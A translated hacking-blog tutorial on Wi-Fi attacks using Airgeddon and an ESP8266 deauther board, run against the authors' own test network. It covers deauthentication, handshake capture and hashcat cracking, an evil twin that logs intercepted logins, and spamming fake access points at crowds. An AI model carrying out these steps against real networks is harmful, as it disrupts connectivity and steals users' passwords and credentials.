Tools, vulnerabilities and attacks on wireless technologies. Evil twin and jammer board

Introduction

We are glad to welcome our dear readers again! We continue the section of articles “No pro-v-ode” in which we review for you various tools, vulnerabilities and attacks on wireless technologies or protocols. Wi-Fi technology has become an integral part of our daily lives. We use wireless networks to access the Internet, exchange data, stream videos and music, and many other purposes. However, with the increasing popularity of Wi-Fi networks, the risk to the security of information transmitted over these networks also increases. This article will use a powerful tool that will help us assess the security level of Wi-Fi networks and identify potential vulnerabilities and a fee for testing the security of Wi-Fi networks.

Disclaimer: All data provided in this article is taken from open sources and does not call for action. They are only data for familiarization and study of the mechanisms of the technologies used.

Airgeddon

Airgeddon – This tool is a powerful and versatile tool designed to test the security of wireless networks. It is capable of auditing the security of Wi-Fi networks, attacking WPS and WPA/WPA2-PSK passwords, scanning networks for vulnerabilities, and performing many other functions.

Installation

In order to install the tool, we only need to download its repository from GitHub and run the executable file, which will first begin checking for the presence of all the necessary tools for the job.

git clone https://github.com/v1s1t0r1sh3r3/airgeddon
cd airgeddon
bash airgeddon.sh

The script will automatically check for the presence of all required components on your device. If any components are missing, you will just need to press the Enter key and the script will automatically install them. Once the installation is complete, you will also only need to press the Enter key to complete the process.

Next, the script will ask which interface you want to use, in our case it is wlan1.

Usage

After this we will see an extensive menu where we can interact with the interface and explore different types of network attacks. For now we will not pay attention to the first item of options, but will focus on attacks.

Let's start by looking at DoS attacks. To do this, we created a test Wi-Fi network, and all subsequent actions will be performed on this network.

Here we are presented with another large menu for selection, in which all attacks are neatly divided into categories from outdated and less effective attacks to more modern and effective attacks.

One tablet device is connected to our access point, we will try more effective attack methods.

But first, we will need to put the adapter into monitoring mode and scan Wi-Fi networks.

Select the first attack “amok mdk4 disconnect”. It will already be aimed at the network that we have chosen; if we do not pre-scan and select, we will have to manually enter the BSSID of the access point.

As we can see, the tool is fully automated and to launch the attack we will simply need to constantly press only one Enter key. That's how simple and clear everything is in this tool.

The result is excellent; clients were disconnected from the access point immediately as soon as we started the attack. Let's test the following “aireplay deauthentication” attack.

It disconnected from the access point two seconds later compared to the previous attack.

Let's move on to the next section “Menu of tools for working with Handshake/PMKID”

As we see here we have only two PMKID capture points and, of course, a handshake, and in principle there is nothing more to add, all that we basically need. Since an attack using PMKID on our access point will be less effective, we will choose the good old handshake.

We select the deauthentication method, in our case this is the first point and set the frequency with which we will attack, we chose the minimum – 10 seconds.

Next, two windows will pop up: monitoring and deauthentication, and after capturing the handshake file, you will be asked where you want to save the file.

Next, go to the “offline WPA/WPA2 decryption” item in which the file we need will already be selected by default. Next, select Personal.

After which we were presented with an extensive menu with a choice of password brute force attacks, here they are divided into two types using a processor and using a CPU/GPU.

We select the third option using hashcat and select the dictionary.

Here is the password, I agree that it is too easy, but as part of testing and for the speed of the result, we set it exactly like this. Do not forget that most less advanced users often set such passwords.

Let's also look at the “Evil Twin” menu. As we can see here there are options for traffic sniffing, let's try, the most interesting point is 8. For this attack we will connect a third Wi-Fi adapter to access the network. After selecting this menu item, you will see the following:

If you have BeEF installed and everything is ok, then go to step 1, to check we can click on point 2 and in our case everything is ok.

Next, select everything as we had before and move on to the next point.

To do this, we connected the third adapter and selected the Wlan2 interface. After setting all the parameters, 6 windows will open, we are mostly interested in the top right and bottom right windows, the top one shows clients, and the bottom one shows which pages they are on.

At the end of the attack, press Enter and the tool will notify you whether passwords and logins were detected, and when they are intercepted, it enters them into a file.

I will skip WPS attacks, because we think their concept is already clear to everyone, WEP attacks are outdated and, in principle, not relevant in most cases, Enterprise attacks, unfortunately, we do not have the opportunity to test. But in order for there to be an understanding of these attacks, we will explain briefly:

Attacks on WPA2-Enterprise systems are aimed at examining the level of security provided by authentication servers and key management mechanisms in complex enterprise networks. These attacks may include attempts to penetrate authentication servers or physical attacks on network equipment. It is important to note that WPA-Enterprise uses EAP to authenticate wireless clients to the RADIUS server, which allows for different authentication methods such as certificates or credentials.

With this tool, basically everything we wanted to tell you. Let’s just summarize: the tool is quite functional, convenient, and it actually has specific functions that are not found in most similar tools. For example, a fake access point that intercepts all traffic on the network.

ESP8266_deauther

This ESP8266 firmware is designed to test 802.11 networks, including the ability to perform a deauthentication attack to disconnect devices from the WiFi network. This project is useful for learning WiFi, Arduino, electronics and programming. It helps check the vulnerabilities of devices to such attacks and update network security if necessary.

Specifications

  • Modification: HW-628 v.1.1

  • Wireless interface: Wi-Fi 802.11 b/g/n 2.4 GHz

  • Rated voltage: 5-9V

  • Memory capacity: 32 MB

  • Dimensions: 49×25 mm

Installation

  • Download the firmware itself from the official repository.

  • Download the utility for installing Windows firmware 64 32

  • Launch the installer:

To determine the required COM port, go to Control Panel\Hardware and Sound\Device Manager. Expand the “Ports (COM and LPT)” tree. And then with simple movements we disconnect and reconnect our device and see which one has been added.

Go to Config and select the path to our firmware.

The Advanced tab should look like this.

Finally, click Flash and start flashing the firmware of our device.

After successful firmware, we restart our device and now it distributes the access point, by default the credentials from the pwned point and the password deauther.

Go to the control panel, open the browser and enter 192.168.4.1

Let's now scan the access points available to us and try to do something. We have created a test access point and one device is connected to it.

Click on select and go to Clients.

As we can see, there is indeed one device connected to the access point. If we wish, we can select specific devices, but in our case there is clearly no need for this, so we will leave everything as is and go to the Attack item.

The first point is clear to us – this is user deauthentication and this point works quite well. The next item is cloning the target access point. It will look like this.

To carry out the next attack, you need to prepare a list of Wi-Fi points with which you plan to “saturate” users who do not understand the situation. There are several ways to create such a list: you can use the method demonstrated above (silencing one access point and launching others with the same name as the original access point), or you can create a random list of access points or create your own list. I think we all understand which of these options may be more interesting for us.

Let's put it all online and get this beauty.

In this way, it is possible to carry out combination attacks by jamming one access point and launching other access points with a unique message. This unconventional method of attracting people's attention can arouse the interest of the crowd, since the Wi-Fi disconnection will force them to pay attention to the network settings and understand the reasons for the failure. As a result, they will see your message. Such activities can be used for a variety of purposes, including social experiments, network security testing, or simply for fun and interesting situations. It is important to remember the legality and ethics of such actions so as not to violate the rights of users and not harm their interests!

The following options are available in the settings section: changing the name of the access point, setting a new password, hiding the network name, setting the deauthentication interval and other functions to configure the network connection. You can easily configure the settings of your access point to ensure the security and ease of use of the card.

Conclusion

Today we took a look at another extensive and useful tool for testing Wi-Fi networks for security. The technical product of interaction with wireless networks was also considered a plus.

Subscribe to LHMedia:

Life-Hack – Hacker / Hacking
News channel
Channel with free video courses
Humor

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *